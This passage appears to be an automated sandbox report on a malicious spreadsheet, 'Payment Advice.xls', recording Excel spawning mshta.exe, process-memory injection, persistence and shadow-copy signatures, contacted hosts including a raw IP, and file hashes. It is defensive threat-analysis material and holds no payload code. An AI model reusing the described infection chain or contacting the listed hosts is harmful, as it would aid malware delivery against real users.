memory/672-95-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-93-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-91-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/672-121-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-130-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 06:48

Reported

2024-11-20 06:50

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

149s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3700 wrote to memory of 2516 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 3700 wrote to memory of 2516 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.114:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 41.140.244.198.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 114.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 136.243.3.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 153.141.79.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3700-2-0x00007FFC0C470000-0x00007FFC0C480000-memory.dmp

memory/3700-1-0x00007FFC0C470000-0x00007FFC0C480000-memory.dmp

memory/3700-3-0x00007FFC4C48D000-0x00007FFC4C48E000-memory.dmp

memory/3700-0-0x00007FFC0C470000-0x00007FFC0C480000-memory.dmp

memory/3700-5-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-6-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-10-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-9-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-8-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-12-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-13-0x00007FFC0A200000-0x00007FFC0A210000-memory.dmp

memory/3700-11-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-7-0x00007FFC0C470000-0x00007FFC0C480000-memory.dmp

memory/3700-4-0x00007FFC0C470000-0x00007FFC0C480000-memory.dmp

memory/3700-14-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-15-0x00007FFC0A200000-0x00007FFC0A210000-memory.dmp

memory/3700-20-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-21-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-19-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-18-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-17-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-16-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-44-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-46-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-47-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-48-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-49-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/3700-51-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-52-0x00007FFC4C3F0000-0x00007FFC4C5E5000-memory.dmp

memory/2516-53-0x00007FF6C8BF0000-0x00007FF6C8BF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 fd88618b0b1b96be28ced569024c79c9
SHA1 143338495681a28a885342e78e9af6fc48e0db67
SHA256 700aa2544f36820b963d6bca54cee824593dbe66896595c3b9fc7a5cc7819f9c
SHA512 245aa679ba80497cef78a78aacd5eddd97ab4d3b7c45b73e313fb80a9b700f353e978817c6a2b7905abe1d45b18452c4d4571d93124298ad496586dae23d2c20